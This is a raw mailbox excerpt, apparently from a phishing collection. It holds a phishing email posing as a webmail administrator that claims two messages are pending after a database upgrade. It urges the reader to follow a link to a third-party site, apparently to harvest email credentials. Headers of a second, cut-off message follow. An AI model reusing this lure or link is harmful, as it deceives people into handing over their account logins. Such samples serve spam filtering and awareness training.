From: "Webmail Admin" <info@bmzltd.com>
Date: Wed, 21 Oct 2015 19:00:24 -0400
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 214

You will not see this in a MIME-aware mail reader.
--===============1677414869==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 Dear jose@monkey.org =

 Your two incoming mails were placed on pending status
due to the recent database upgrade,
In order to receive the messages =

follow the link below to Upgrade your email Account. =

 Upgrade Your Email Account Sincerely,
Mail Service Team. =A92001 - 2015 Administrator. All Rights Reserved.	 =



--===============1677414869==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><H4>
<P align=3Dcenter>Dear jose@monkey.org </P>
<P align=3Dcenter>Your two incoming mails were placed on pending status<BR>=
due to the recent database upgrade,<BR>In order to receive the messages <BR=
>follow the link below to Upgrade your email Account. </P>
<P align=3Dcenter><A style=3D"COLOR: blue" href=3D"http://iluminaciondelsol=
.com.ar/assets/img/rs-plugin/gradient/ssc/index.html" target=3D'_blank"'>Up=
grade Your Email Account</A> =

<P align=3Dcenter><SPAN class=3Do>Sincerely,<BR></SPAN><SPAN class=3Dk>Mail=
 Service Team. =

<P align=3Dcenter><FONT color=3Dblue>=A92001 - 2015 Administrator. All Righ=
ts Reserved.</TD> </P></FONT></SPAN></H4></BODY></HTML>
--===============1677414869==--

From jbarney@co.humboldt.ca.us  Fri Oct 23 07:22:19 2015
Return-Path: <jbarney@co.humboldt.ca.us>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id 7BDB6F412F
	for <jose@login.monkey.org>; Fri, 23 Oct 2015 07:22:19 -0500 (CDT)
Received: from smtpin03.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay03.b.hostedemail.com (Postfix) with SMTP id 3AFA318470C
	for <jose@login.monkey.org>; Fri, 23 Oct 2015 12:22:19 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70773285198.03.milk37_8891db84fc861
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 62,3.907,0,bbd43d5c386db035,d41d8cd98f00b204,jbarney@co.humboldt.ca.us,:in@webs.org,RULES_HIT:10:41:72:355:379:582:589:960:962:967:973:978:983:988:989:1152:1158:1189:1190:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1534:1541:1566:1575:1588:1589:1592:1594:1711:1714:1730:1777:1792:2198:2199:2525:2527:2561:2564:2682:2685:2731:2859:2892:2900:2901:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3586:3865:3867:3868:3870:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4361:5007:6117:6650:6675:8603:8885:8957:9025:9388:9411:9855:9873:10011:10049:10214:10346:10400:10482:11473:11527:11656:11657:11658:11914:12043:12519:12555:12657:12660:12661:12855:13139:13163:13229:13237:13868:14093:14094:14096:19901:19997:21080,0,RBL:neutral,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:2:0
X-HE-Tag: milk37_8891db84fc861
X-Filterd-Recvd-Size: 3369
Received: from CTY-XSV01.all.co.humboldt.ca.us (mail.co.humboldt.ca.us [216.102.9.2])
	by imf27.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri, 23 Oct 2015 12:22:18 +0000 (UTC)
Received: from CTY-XCN01.all.co.humboldt.ca.us ([169.254.1.194]) by
 CTY-XSV01.all.co.humboldt.ca.us ([10.1.0.113]) with mapi id 14.03.0248.002;
 Fri, 23 Oct 2015 05:22:17 -0700
